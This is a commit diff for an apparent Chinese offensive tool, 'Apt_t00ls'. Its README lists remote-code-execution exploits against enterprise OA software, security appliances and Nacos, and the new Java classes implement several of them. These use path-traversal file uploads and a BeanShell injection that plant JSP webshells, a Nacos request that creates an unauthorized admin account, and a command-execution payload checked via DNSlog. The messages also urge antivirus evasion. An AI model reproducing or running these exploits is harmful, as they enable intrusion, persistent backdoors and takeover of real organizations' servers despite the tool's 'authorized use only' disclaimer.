Update README.md

Update cas_cvm_upload.java 文件名校验

.gitignore

@@ -1,7 +0,0 @@
-#idea
-.idea
-*.iml
-
-
-#maven编译
-target

README.md

@@ -1,12 +1,41 @@
 # Apt_t00ls
+
 高危漏洞利用工具
+
 ---  
 
-## 开心指数
+## 贡献者名单
 
-[![Stargazers over time](https://starchart.cc/White-hua/Apt_t00ls.svg)](https://starchart.cc/White-hua/Apt_t00ls)
+<div>
+	<table frame=void>
+	<tr>
+	<td align="center">
+            <img src="https://avatars.githubusercontent.com/u/40447710"
+                  alt="Typora-Logo"
+                  height="80"/>
+            <br>
+            <a href="https://github.com/Geccccc"><sub>Gec</sub></a>
+        </td>
+        <td align="center">
+            <img src="./image/I0veD.jpg"
+                  alt="Typora-Logo"
+                  height="80"/>
+            <br>
+            <a href="https://github.com/cdxiaodong"><sub>I0veD</sub></a>
+        </td>  
+        <td align="center">
+            <img src="./image/luckyh.jpg"
+                  alt="Typora-Logo"
+                  height="80"/>
+            <br>
+            <a href="https://github.com/stop-bullshit"><sub>luckyh</sub></a>
+        </td>
+    </tr>
+</table>
+</div>
 
 ---
+
 泛微:  
 e-cology workrelate_uploadOperation.jsp-RCE (默认写入冰蝎4.0.3aes)  
 e-cology page_uploadOperation.jsp-RCE (暂未找到案例 仅供检测poc)  
@@ -15,21 +44,28 @@ e-cology KtreeUploadAction-RCE (默认写入冰蝎4.0.3aes)
 e-cology WorkflowServiceXml-RCE (默认写入内存马 冰蝎 3.0 beta11)  
 e-office logo_UploadFile.php-RCE (默认写入冰蝎4.0.3aes)  
 e-office10 OfficeServer.php-RCE (默认写入冰蝎4.0.3aes)  
+e-office8 fileupload-RCE (默认写入冰蝎4.0.3aes)  
 e-office doexecl.php-RCE (写入phpinfo,需要getshell请自行利用)  
+e-mobile_6.0 sqlli-RCE (可直接执行系统命令)  
 e-mobile_6.6 messageType.do-SQlli (sqlmap利用，暂无直接shell的exp)
 
 蓝凌：  
 landray_datajson-RCE (可直接执行系统命令)  
 landray_treexmlTmpl-RCE (可直接执行系统命令)  
-landray_sysSearchMain-RCE (多个payload，写入哥斯拉 3.03 密码 yes)
+landray_sysSearchMain-RCE (多个payload，写入哥斯拉 3.03 密码 yes)  
+landrayoa_fileupload_sysSearch-RCE (默认写入冰蝎4.0.3aes)
 
 用友:  
 yongyou_chajet_RCE (用友畅捷通T+ rce 默认写入哥斯拉 Cshap/Cshap_aes_base64)  
+yongyou_chajet_反序列化RCE(可直接执行系统命令)  
 yongyou_NC_FileReceiveServlet-RCE 反序列化rce (默认写入冰蝎4.0.3aes)  
 yongyou_NC_bsh.servlet.BshServlet_RCE (可直接执行系统命令)  
+yongyou_NC_jsInovke任意文件上传 (默认写入冰蝎4.0.3aes)  
 yongyou_NC_NCFindWeb 目录遍历漏洞 (可查看是否存在历史遗留webshell)  
 yongyou_GRP_UploadFileData-RCE(默认写入冰蝎4.0.3aes)  
-yongyou_KSOA_imageUpload-RCE (默认写入冰蝎4.0.3aes)
+yongyou_GRP_AppProxy-RCE(默认写入冰蝎4.0.3aes)  
+yongyou_KSOA_imageUpload-RCE (默认写入冰蝎4.0.3aes)  
+yongyou_KSOA_Attachmentupload-RCE (默认写入冰蝎4.0.3aes)
 
 万户：  
 wanhuoa_OfficeServer-RCE(默认写入冰蝎4.0.3aes)    
@@ -42,19 +78,30 @@ wanhuoa_fileUploadController-RCE(默认写入冰蝎4.0.3aes)
 seeyonoa_main_log4j2-RCE (仅支持检测，自行开启ladp服务利用)  
 seeyonoa_wpsAssistServlet-RCE(默认写入冰蝎4.0.3aes)  
 seeyonoa_htmlofficeservlet-RCE(默认写入冰蝎4.0.3aes)  
-seeyonoa_ajaxBypass-RCE(写入天蝎 密码sky)
+seeyonreport_svg_upload-RCE(默认写入冰蝎4.0.3aes)  
+seeyonoa_ajaxBypass-RCE(写入天蝎 密码sky)  
+seeyon_testsqli-RCE(仅检测是否存在漏洞页面)
 
 通达:  
 tongdaoa_getdata-RCE (直接执行系统命令)  
 tongdaoa_apiali-RCE (默认写入冰蝎4.0.3aes)
 
+帆软：
+fanruan_save_svg-RCE (默认写入冰蝎4.0.3aes)
+
 中间件:  
 IIS_PUT_RCE (emm暂时没办法getshell  仅支持检测 java没有MOVE方法)
 
 安全设备:  
 综合安防_applyCT_fastjson-RCE(仅支持检测,自行使用ladp服务利用)  
+综合安防_api_file任意文件上传 (默认写入冰蝎4.0.3aes)  
+综合安防_external_report任意文件上传 (默认写入冰蝎4.0.3aes)  
 网康下一代防火墙_ngfw_waf_route-RCE(写入菜刀shell 密码:nishizhu)  
+H3C cas_cvm_upload-RCE  (默认写入冰蝎4.0.3aes)  
+大华智慧园区任意文件上传  (默认写入冰蝎4.0.3aes)  
+深信服应用交付管理系统命令执行  
 网御星云账号密码泄露
+阿里nacos未授权任意用户添加
 
 使用截图：  
 ![QQ截图20221014202028](https://user-images.githubusercontent.com/100954709/195846430-84bfff61-2c7b-4027-abcc-76d5910b76e4.png)  
@@ -88,6 +135,13 @@ Tasklist敏感进程检测
 
 ![my](https://user-images.githubusercontent.com/100954709/193801691-df73fec6-284a-450a-943a-09fe023bcde0.png)
 
+
+---
+
+
+## 开心指数
+
+[![Stargazers over time](https://starchart.cc/White-hua/Apt_t00ls.svg)](https://starchart.cc/White-hua/Apt_t00ls)
 ---
 ## 免责声明
 本工具仅面向合法授权的企业安全建设行为，如您需要测试本工具的可用性，请自行搭建靶机环境。

src/main/java/Main.java

@@ -1,4 +1,5 @@
 import cn.hutool.core.io.resource.ResourceUtil;
+import java.net.URL;
 import java.util.Objects;
 import javafx.application.Application;
 import javafx.fxml.FXMLLoader;
@@ -7,13 +8,14 @@ import javafx.scene.Scene;
 import javafx.stage.Stage;
 
 public class Main extends Application {
+    public Main() {
+    }
 
-    @Override
+    public void start(Stage primaryStage) throws Exception {
-    public void start(Stage primaryStage) throws Exception{
+        Parent root = (Parent)FXMLLoader.load(ResourceUtil.getResource("fxml/Main.fxml"));
-        Parent root = FXMLLoader.load(ResourceUtil.getResource("fxml/Main.fxml"));
         primaryStage.setTitle("APT");
-        Scene scene = new Scene(root,1280,910);
+        Scene scene = new Scene(root, 1280.0, 910.0);
-        scene.getStylesheets().add(Objects.requireNonNull(Main.class.getResource("/css/main.css")).toExternalForm());
+        scene.getStylesheets().add(((URL)Objects.requireNonNull(Main.class.getResource("/css/main.css"))).toExternalForm());
         primaryStage.setScene(scene);
         primaryStage.show();
     }

src/main/java/controller/AttController.java

@@ -82,7 +82,7 @@ public class AttController {
     Runtime run = Runtime.getRuntime();
     //path:文件路径
     try {
-      run.exec("notepad " + shell.Jsppath);
+      run.exec(shell.open + shell.Jsppath);
     } catch (Exception e) {
       e.printStackTrace();
     }
@@ -93,7 +93,7 @@ public class AttController {
     Runtime run = Runtime.getRuntime();
     //path:文件路径
     try {
-      run.exec("notepad " + shell.Jspxpath);
+      run.exec(shell.open + shell.Jspxpath);
     } catch (Exception e) {
       e.printStackTrace();
     }
@@ -104,7 +104,7 @@ public class AttController {
     Runtime run = Runtime.getRuntime();
     //path:文件路径
     try {
-      run.exec("notepad " + shell.Asppath);
+      run.exec(shell.open + shell.Asppath);
     } catch (Exception e) {
       e.printStackTrace();
     }
@@ -115,7 +115,7 @@ public class AttController {
     Runtime run = Runtime.getRuntime();
     //path:文件路径
     try {
-      run.exec("notepad " + shell.Aspxpath);
+      run.exec(shell.open + shell.Aspxpath);
     } catch (Exception e) {
       e.printStackTrace();
     }
@@ -126,7 +126,7 @@ public class AttController {
     Runtime run = Runtime.getRuntime();
     //path:文件路径
     try {
-      run.exec("notepad " + shell.Phppath);
+      run.exec(shell.open + shell.Phppath);
     } catch (Exception e) {
       e.printStackTrace();
     }
@@ -137,7 +137,7 @@ public class AttController {
     Runtime run = Runtime.getRuntime();
     //path:文件路径
     try {
-      run.exec("notepad " + shell.dnspath);
+      run.exec(shell.open + shell.dnspath);
     } catch (Exception e) {
       e.printStackTrace();
     }
@@ -148,7 +148,7 @@ public class AttController {
     Runtime run = Runtime.getRuntime();
     //path:文件路径
     try {
-      run.exec("notepad " + shell.dnscofpath);
+      run.exec(shell.open + shell.dnscofpath);
     } catch (Exception e) {
       e.printStackTrace();
     }
@@ -270,60 +270,26 @@ public class AttController {
   @FXML
   public void initialize() {
 
-    textArea_info.setText(
-        "------------------------------------目前EXP如下--------------------------------");
-    textArea_info.appendText(
-        "\ne-cology workrelate_uploadOperation.jsp-RCE (默认写入冰蝎4.0.3aes)");
-    textArea_info.appendText("\ne-cology page_uploadOperation.jsp-RCE (暂未找到案例 仅供检测poc)");
-    textArea_info.appendText("\ne-cology WorkflowServiceXml-RCE (默认写入内存马 冰蝎 3.0 beta11)");
-    textArea_info.appendText("\ne-cology BshServlet-RCE (可直接执行系统命令)");
-    textArea_info.appendText("\ne-cology KtreeUploadAction-RCE (默认写入冰蝎4.0.3aes)");
-    textArea_info.appendText("\ne-office logo_UploadFile.php-RCE (默认写入冰蝎4.0.3aes)");
-    textArea_info.appendText("\ne-office doexecl.php-RCE (写入phpinfo,需要getshell请自行利用)");
-    textArea_info.appendText("\ne-office10 OfficeServer.php-RCE (默认写入冰蝎4.0.3aes)");
-    textArea_info.appendText("\ne-mobile_6.6 messageType.do-SQlli (sqlmap利用，暂无直接shell的exp)");
 
     textArea_info.appendText(
-        "\n\nlandray_sysSearchMain-RCE (多个payload，写入哥斯拉 3.03 密码 yes)");
+        "\n---------------------------(禁止未授权恶意攻击)-------------------------");
-    textArea_info.appendText("\nlandray_treexmlTmpl-RCE (可直接执行系统命令)");
-    textArea_info.appendText("\nlandray_datajson-RCE (可直接执行系统命令)");
-
-    textArea_info.appendText("\n\nwanhu_OfficeServer-RCE (可直接执行系统命令)");
-    textArea_info.appendText("\nwanhu_smartUpload-RCE (可直接执行系统命令)");
-    textArea_info.appendText("\nwanhuoa_OfficeServerservlet-RCE(默认写入冰蝎4.0.3aes)");
-    textArea_info.appendText("\nwanhu_DocumentEdit-SQlli (mssql数据库 可 os-shell)");
-    textArea_info.appendText("\nwanhuoa_fileUploadController-RCE (默认写入冰蝎4.0.3aes)");
-
-    textArea_info.appendText("\ntongdaoa_getdata-RCE (直接执行系统命令)");
-    textArea_info.appendText("\ntongdaoa_apiali-RCE (默认写入冰蝎4.0.3aes)");
 
     textArea_info.appendText(
-        "\n\nyongyou_chajet-RCE (用友畅捷通T+ rce 默认写入哥斯拉 Cshap/Cshap_aes_base64)");
+            "\n\n 本工具仅供学习研究及合法授权下渗透测试！！！！！\n");
-    textArea_info.appendText("\nyongyou_NC_bsh.servlet.BshServlet-RCE (可直接执行系统命令)");
-    textArea_info.appendText(
-        "\nyongyou_NC_NCFindWeb 目录遍历漏洞 (可查看是否存在历史遗留webshell)");
-    textArea_info.appendText("\nyongyou_NC_FileReceiveServlet-RCE (默认写入冰蝎4.0.3aes)");
-    textArea_info.appendText("\nyongyou_GRP_UploadFileData-RCE (默认写入冰蝎4.0.3aes)");
-    textArea_info.appendText("\nyongyou_KSOA_imageUpload-RCE (默认写入冰蝎4.0.3aes)");
-
-    textArea_info.appendText("\n\nseeyonoa_main_log4j2-RCE (仅支持检测)");
-    textArea_info.appendText("\nseeyonoa_wpsAssistServlet-RCE (默认写入冰蝎4.0.3aes)");
-    textArea_info.appendText("\nseeyonoa_htmlofficeservlet-RCE (默认写入冰蝎4.0.3aes)");
-    textArea_info.appendText("\nseeyonoa_ajaxBypass-RCE (写入天蝎 密码sky)");
 
     textArea_info.appendText(
-        "\n\nIIS_PUT_RCE (emm暂时没办法getshell  仅支持检测 java没有MOVE方法)");
+            "\n 本工具webshell写入判断依据为md5 在修改shll内容时请勿删除md5");
-
+    textArea_info.appendText(
-    textArea_info.appendText("\n\n综合安防_applyCT_fastjson-RCE(仅支持检测,自行使用ladp服务利用)");
+            "\n config目录中shell开头文件均为 冰蝎4.0.3 aes生成webshell");
-    textArea_info.appendText("\n网康下一代防火墙_ngfw_waf_route-RCE(写入菜刀shell 密码:nishizhu)");
+    textArea_info.appendText(
-    textArea_info.appendText("\n网御星云-上网行为管理账号密码泄露_Leadsec_ACM");
+            "\n gsl.jsp为哥斯拉4.01 jsp aes 默认密码密钥 ");
+    textArea_info.appendText(
+            "\n chajet目录下为畅捷通编译好shell文件");
+    textArea_info.appendText(
+            "\n dnslog文件夹下为部分漏洞所需dnslog回显测试所用，请自行修改dnslog文件");
 
     textArea_info.appendText(
-        "\n\n-------------------------------(禁止未授权恶意攻击)-----------------------------");
+            "\n\n---------------------------(禁止未授权恶意攻击)-------------------------");
-
-    textArea_info.appendText("\n\n---------小提醒，工具所用shell为冰蝎默认aes加密生成shell"
-        + "\n 若工具提示shell写入成功 但访问不存在或连接不上 请考虑免杀，修改shell位置在工具目录下Apt_config"
-        + "\n 工具判断shell是否写入依据md5 可自行打开查看 修改shell请保留md5 否则会影响漏洞判断");
 
     //设置自动换行
     textArea_info.setWrapText(true);
@@ -361,6 +327,9 @@ public class AttController {
       case "安全设备":
         listview_kinds.setItems(Kinds_Exp.equipment());
         break;
+      case "CMS":
+        listview_kinds.setItems(Kinds_Exp.cms());
+        break;
     }
     updateListView(listview_kinds.getItems().get(0));
   }
@@ -399,18 +368,37 @@ public class AttController {
       case "通达-OA":
         choiceBox_exp.setItems(exp.tongdaoa());
         break;
+      case "帆软-OA":
+        choiceBox_exp.setItems(exp.fanruan());
+        break;
+
       case "IIS":
         choiceBox_exp.setItems(exp.iis());
         break;
+
+
+
       case "海康":
         choiceBox_exp.setItems(exp.hik());
         break;
+      case "H3C":
+        choiceBox_exp.setItems(exp.h3c());
+        break;
       case "奇安信":
         choiceBox_exp.setItems(exp.qianxin());
         break;
       case "网御星云":
         choiceBox_exp.setItems(exp.wangyu());
         break;
+
+
+
+      case "Alibaba":
+        choiceBox_exp.setItems(exp.Alibaba());
+        break;
+
+
+
       default:
         System.out.println(selectedItem);
         // 当所选项还没有exp给默认选项

src/main/java/controller/TsklistController.java

@@ -34,7 +34,7 @@ public class TsklistController {
         String finallist = shell.ifexe(resultlist22, exelist);
         String res;
         try {
-            res = new String(finallist.getBytes("gbk"));
+            res = new String(finallist.getBytes("utf-8"));
             textArea_res.setText(res);
         } catch (UnsupportedEncodingException e) {
             e.printStackTrace();

src/main/java/exp/cms/nacos_Creatuser.java

@@ -0,0 +1,47 @@
+package exp.cms;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+
+import java.util.HashMap;
+
+public class nacos_Creatuser implements Exploitlnterface {
+    @Override
+    public Boolean checkVul(String url, TextArea textArea) {
+        return att(url, textArea);
+    }
+
+    @Override
+    public Boolean getshell(String url, TextArea textArea) {
+        Platform.runLater(() -> {
+            textArea.appendText("\n 该漏洞无法getshell");
+        });
+        return false;
+    }
+
+    private boolean att(String url , TextArea textArea){
+        HashMap<String,String> head = new HashMap<String,String>();
+        head.put("User-Agent","Nacos-Server");
+        String poststring = "";
+        Response post = HttpTools.post(url + "/nacos/v1/auth/users?username=nishizhu&password=zhu@123", poststring, head, "utf-8");
+
+        if(post.getCode() == 200 && post.getText().contains("create user ok")){
+            Platform.runLater(() -> {
+                textArea.appendText("\n nacos任意用户添加漏洞存在  用户添加成功，账号：nishizhu 密码：zhu@123");
+            });
+            return true;
+        }else {
+            Platform.runLater(() -> {
+                textArea.appendText("\n nacos任意用户添加-漏洞不存在 (出现误报请联系作者)");
+            });
+            return false;
+        }
+    }
+
+
+
+
+}

src/main/java/exp/equipment/Sangfor/ad_passwd.java

@@ -0,0 +1,27 @@
+package exp.equipment.Sangfor;
+
+import cn.hutool.http.HttpRequest;
+import core.Exploitlnterface;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+
+import java.util.HashMap;
+
+public class ad_passwd implements Exploitlnterface {
+    @Override
+    public Boolean checkVul(String url, TextArea textArea) {
+        return null;
+    }
+
+    @Override
+    public Boolean getshell(String url, TextArea textArea) {
+        return null;
+    }
+
+    private Boolean att(String url, TextArea textArea){
+        Response response = HttpTools.get(url, new HashMap<String, String>(), "utf-8");
+        return false;
+    }
+}
+

src/main/java/exp/equipment/h3c/cas_cvm_upload.java

@@ -0,0 +1,76 @@
+package exp.equipment.h3c;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+import utils.shell;
+
+import java.util.HashMap;
+
+public class cas_cvm_upload implements Exploitlnterface {
+    @Override
+    public Boolean checkVul(String url, TextArea textArea) {
+        return att(url, textArea);
+    }
+
+    @Override
+    public Boolean getshell(String url, TextArea textArea) {
+        return shell(url, textArea);
+    }
+
+    private boolean att(String url,TextArea textArea){
+        String payload = shell.readFile(shell.Testpath);
+
+        HashMap<String,String> head = new HashMap<>();
+        head.put("Content-range","bytes 0-10/20");
+        head.put("Accept-Encoding","gzip, deflate");
+        head.put("Content-type","");
+
+        Response post = HttpTools.post(url + "/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/nishizhu.txt&name=222", payload, head, "utf-8");
+
+        Response response = HttpTools.get(url + "/cas/js/lib/buttons/nishizhu.txt", new HashMap<String, String>(), "utf-8");
+        if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+            Platform.runLater(() -> {
+                textArea.appendText(
+                        "\n 漏洞存在 测试文件写入成功 \n " + url + "/cas/js/lib/buttons/nishizhu.txt"
+                );
+            });
+            return true;
+        }else {
+            Platform.runLater(() -> {
+                textArea.appendText("\n cas_cvm云计算管理平台-RCE-漏洞不存在 (出现误报请联系作者)");
+            });
+            return false;
+        }
+    }
+
+    private boolean shell(String url,TextArea textArea){
+        String payload = shell.readFile(shell.Jsppath);
+
+        HashMap<String,String> head = new HashMap<>();
+        head.put("Content-range","bytes 0-10/20");
+        head.put("Accept-Encoding","gzip, deflate");
+        head.put("Content-type","");
+
+        Response post = HttpTools.post(url + "/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/nishizhu.jsp&name=222", payload, head, "utf-8");
+
+        Response response = HttpTools.get(url + "/cas/js/lib/buttons/nishizhu.jsp", new HashMap<String, String>(), "utf-8");
+        if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+            Platform.runLater(() -> {
+                textArea.appendText(
+                        "\n 漏洞存在 webshell文件写入成功 \n " + url + "/cas/js/lib/buttons/nishizhu.jsp"
+                );
+            });
+            return true;
+        }else {
+            Platform.runLater(() -> {
+                textArea.appendText("\n 疑似杀软查杀 请手动复现");
+            });
+            return false;
+        }
+    }
+
+
+}

src/main/java/exp/oa/fanruan/fanruan_save_svg.java

@@ -0,0 +1,77 @@
+package exp.oa.fanruan;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+import utils.shell;
+
+import java.util.HashMap;
+
+public class fanruan_save_svg implements Exploitlnterface {
+    @Override
+    public Boolean checkVul(String url, TextArea textArea) {
+        return att(url, textArea);
+    }
+
+    @Override
+    public Boolean getshell(String url, TextArea textArea) {
+        return shell(url, textArea);
+    }
+
+    private Boolean att(String url, TextArea textArea){
+        HashMap<String, String> head = new HashMap<>();
+        head.put("Content-Type", "text/xml;charset=UTF-8");
+        String payload = "{\"__CONTENT__\": \"" + shell.readFile(shell.Testpath).replace("\"","\\\"") + "\", \"__CHARSET__\": \"UTF-8\"}";
+            Response post = HttpTools.post(url + "/WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/nishizhu.svg.jsp", payload, head, "utf-8");
+
+        if(post.getCode() == 200){
+            Response response = HttpTools.get(url + "/WebReport/nishizhu.svg.jsp", new HashMap<String, String>(), "utf-8");
+            if (response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+                Platform.runLater(() -> {
+                    textArea.appendText("\n 漏洞存在 测试文件写入成功\n " + url + "/nishizhu.svg.jsp");
+                });
+                return true;
+            }else {
+                Platform.runLater(() -> {
+                    textArea.appendText("\n 疑似杀软查杀 请手动复现");
+                });
+                return false;
+            }
+        }else {
+            Platform.runLater(() -> {
+                textArea.appendText("\n fanruan-design_save_svg-RCE-漏洞不存在 (出现误报请联系作者)");
+            });
+            return false;
+        }
+    }
+
+    private Boolean shell(String url, TextArea textArea){
+        HashMap<String, String> head = new HashMap<>();
+        head.put("Content-Type", "text/xml;charset=UTF-8");
+        String payload = "{\"__CONTENT__\": \"" + shell.readFile(shell.Jsppath).replace("\"","\\\"") + "\", \"__CHARSET__\": \"UTF-8\"}";
+        Response post = HttpTools.post(url + "/WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/nishidazhu.svg.jsp", payload, head, "utf-8");
+
+        if(post.getCode() == 200){
+            Response response = HttpTools.get(url + "/WebReport/nishizhu.svg.jsp", new HashMap<String, String>(), "utf-8");
+            if (response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+                Platform.runLater(() -> {
+                    textArea.appendText("\n 漏洞存在 webshell文件写入成功\n " + url + "/nishidazhu.svg.jsp");
+                });
+                return true;
+            }else {
+                Platform.runLater(() -> {
+                    textArea.appendText("\n 疑似杀软查杀 请手动复现");
+                });
+                return false;
+            }
+        }else {
+            Platform.runLater(() -> {
+                textArea.appendText("\n 疑似杀软查杀 请手动复现");
+            });
+            return false;
+        }
+    }
+
+}

src/main/java/exp/oa/landrayoa/landray_datajson.java

@@ -1,9 +1,7 @@
 package exp.oa.landrayoa;
 
 import core.Exploitlnterface;
-
 import java.util.HashMap;
-
 import javafx.application.Platform;
 import javafx.scene.control.TextArea;
 import utils.HttpTools;
@@ -29,7 +27,7 @@ public class landray_datajson implements Exploitlnterface {
         shell.readFile(shell.dnspath).replace("http://", "");
         String payload = "/data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=function%20test()%7B%20return%20java.lang.Runtime%7D;r=test();r.getRuntime().exec(%22ping%20-c%204%20" + shell.getRandomString() + "." + dnslog + "%22)&type=1";
         Response response = HttpTools.get(url + payload, new HashMap<String, String>(), "utf-8");
-        if (response.getCode() == 200 && response.getText().contains("success")) {
+        if (response.getCode() == 200 && response.getText().contains("模拟通过")) {
             Platform.runLater(() -> {
                 textArea.appendText("\n漏洞存在 请自行利用\n" + url + payload);
             });

src/main/java/exp/oa/landrayoa/landray_fileupload_sysSearch.java

@@ -0,0 +1,75 @@
+package exp.oa.landrayoa;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import sun.misc.BASE64Encoder;
+import utils.HttpTools;
+import utils.Response;
+import utils.shell;
+
+import java.util.HashMap;
+
+public class landray_fileupload_sysSearch implements Exploitlnterface {
+
+    @Override
+    public Boolean checkVul(String url, TextArea textArea) {
+        Boolean att = att(url, textArea);
+        return att;
+    }
+
+    @Override
+    public Boolean getshell(String url, TextArea textArea) {
+        return shell(url,textArea);
+    }
+
+    private Boolean att(String url,TextArea textArea){
+        HashMap<String,String> head = new HashMap<>();
+        head.put("Content-Type","application/x-www-form-urlencoded");
+
+        String ok_result = (new BASE64Encoder()).encodeBuffer(shell.readFile(shell.Testpath).getBytes()).trim();
+        String t1 = shell.gbEncoding("import java.lang.*;import java.io.*;Class cls=Thread.currentThread().getContextClassLoader().loadClass(\"bsh.Interpreter\");String path=cls.getProtectionDomain().getCodeSource().getLocation().getPath();File f=new File(path.split(\"WEB-INF\")[0]+\"/loginzhu.jsp\");f.createNewFile();FileOutputStream fout=new FileOutputStream(f);fout.write(new sun.misc.BASE64Decoder().decodeBuffer(\"" + ok_result + "\"));fout.close()");
+        String payload = "var={\"body\":{\"file\":\"/sys/search/sys_search_main/sysSearchMain.do?method=editParam\"}}&fdParemNames=12&fdParameters=<java><void class=\"bsh.Interpreter\"><void%20method=%22eval%22><string>"+ t1 +"</string></void></void></java>";
+
+        Response post = HttpTools.post(url + "/sys/ui/extend/varkind/custom.jsp", payload, head, "utf-8");
+        Response response = HttpTools.get(url + "/loginzhu.jsp", new HashMap<String, String>(), "utf-8");
+        if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+            Platform.runLater(() -> {
+                textArea.appendText("\n 漏洞存在 测试文件写入成功 \n " + url + "/loginzhu.jsp");
+            });
+            return true;
+        }else {
+            Platform.runLater(() -> {
+                textArea.appendText("\n landrayoa_fileupload_sysSearch-RCE-漏洞不存在 (出现误报请联系作者)");
+            });
+            return false;
+        }
+    }
+
+
+    private Boolean shell(String url,TextArea textArea){
+        HashMap<String,String> head = new HashMap<>();
+        head.put("Content-Type","application/x-www-form-urlencoded");
+
+        String rdf = shell.readFile(shell.Jsppath).trim();
+        String ok_result = (new BASE64Encoder()).encodeBuffer(rdf.getBytes());
+        String t1 = shell.gbEncoding("import java.lang.*;import java.io.*;Class cls=Thread.currentThread().getContextClassLoader().loadClass(\"bsh.Interpreter\");String path=cls.getProtectionDomain().getCodeSource().getLocation().getPath();File f=new File(path.split(\"WEB-INF\")[0]+\"/loginzhuda.jsp\");f.createNewFile();FileOutputStream fout=new FileOutputStream(f);fout.write(new sun.misc.BASE64Decoder().decodeBuffer(\"" + ok_result + "\"));fout.close()");
+        String payload = "var={\"body\":{\"file\":\"/sys/search/sys_search_main/sysSearchMain.do?method=editParam\"}}&fdParemNames=12&fdParameters=<java><void class=\"bsh.Interpreter\"><void%20method=%22eval%22><string>"+ t1 +"</string></void></void></java>";
+
+        Response post = HttpTools.post(url + "/sys/ui/extend/varkind/custom.jsp", payload, head, "utf-8");
+        Response response = HttpTools.get(url + "/loginzhuda.jsp", new HashMap<String, String>(), "utf-8");
+        if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+            Platform.runLater(() -> {
+                textArea.appendText("\n 漏洞存在 shell文件写入成功 \n " + url + "/loginzhuda.jsp");
+            });
+            return true;
+        }else {
+            Platform.runLater(() -> {
+                textArea.appendText("\n getshell失败！！！waf查杀！！！请进行免杀！！！！！");
+            });
+            return false;
+        }
+    }
+
+
+}

src/main/java/exp/oa/seeyonoa/seeyon_testsqli.java

@@ -0,0 +1,43 @@
+package exp.oa.seeyonoa;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+
+import java.util.HashMap;
+
+public class seeyon_testsqli implements Exploitlnterface {
+    @Override
+    public Boolean checkVul(String url, TextArea textArea) {
+        return att(url,textArea);
+    }
+
+    @Override
+    public Boolean getshell(String url, TextArea textArea) {
+        Platform.runLater(() -> {
+            textArea.appendText("\n 该漏洞暂不支持getshell 请手动利用");
+        });
+        return false;
+    }
+
+    private boolean att(String url , TextArea textArea){
+        Response response = HttpTools.get(url + "/yyoa/common/js/menu/test.jsp", new HashMap<String, String>(), "utf-8");
+        if (response.getCode() == 200) {
+            Platform.runLater(() -> {
+                textArea.appendText("\n 漏洞页面存在 请自行查看是否存在注入");
+            });
+            return true;
+        }else {
+            Platform.runLater(() -> {
+                textArea.appendText("\n seeyon_testsqli-RCE-漏洞不存在 (出现误报请联系作者)");
+            });
+            return false;
+        }
+    }
+
+
+
+}
+

src/main/java/exp/oa/seeyonoa/seeyonreport_svg_upload.java

@@ -0,0 +1,77 @@
+package exp.oa.seeyonoa;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+import utils.shell;
+
+import java.util.HashMap;
+
+public class seeyonreport_svg_upload implements Exploitlnterface {
+    @Override
+    public Boolean checkVul(String url, TextArea textArea) {
+        return att(url, textArea);
+    }
+
+    @Override
+    public Boolean getshell(String url, TextArea textArea) {
+        return shell(url, textArea);
+    }
+
+    private Boolean att(String url, TextArea textArea){
+        HashMap<String, String> head = new HashMap<>();
+        head.put("Content-Type", "text/xml;charset=UTF-8");
+        String payload = "{\"__CONTENT__\": \"" + shell.readFile(shell.Testpath).replace("\"","\\\"") + "\", \"__CHARSET__\": \"UTF-8\"}";
+        Response post = HttpTools.post(url + "/seeyonreport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../WebReport/nishizhu.svg.jsp", payload, head, "utf-8");
+
+        if(post.getCode() == 200){
+            Response response = HttpTools.get(url + "/seeyonreport/WebReport/nishizhu.svg.jsp", new HashMap<String, String>(), "utf-8");
+            if (response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+                Platform.runLater(() -> {
+                    textArea.appendText("\n 漏洞存在 测试文件写入成功\n " + url + "/seeyonreport/WebReport/nishizhu.svg.jsp");
+                });
+                return true;
+            }else {
+                Platform.runLater(() -> {
+                    textArea.appendText("\n 疑似杀软查杀 请手动复现");
+                });
+                return false;
+            }
+        }else {
+            Platform.runLater(() -> {
+                textArea.appendText("\n seeyonoa_seeyonreport_upload-RCE-漏洞不存在 (出现误报请联系作者)");
+            });
+            return false;
+        }
+    }
+
+    private Boolean shell(String url, TextArea textArea){
+        HashMap<String, String> head = new HashMap<>();
+        head.put("Content-Type", "text/xml;charset=UTF-8");
+        String payload = "{\"__CONTENT__\": \"" + shell.readFile(shell.Jsppath).replace("\"","\\\"") + "\", \"__CHARSET__\": \"UTF-8\"}";
+        Response post = HttpTools.post(url + "/seeyonreport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../WebReport/nishidazhu.svg.jsp", payload, head, "utf-8");
+
+        if(post.getCode() == 200){
+            Response response = HttpTools.get(url + "/seeyonreport/WebReport/nishizhu.svg.jsp", new HashMap<String, String>(), "utf-8");
+            if (response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+                Platform.runLater(() -> {
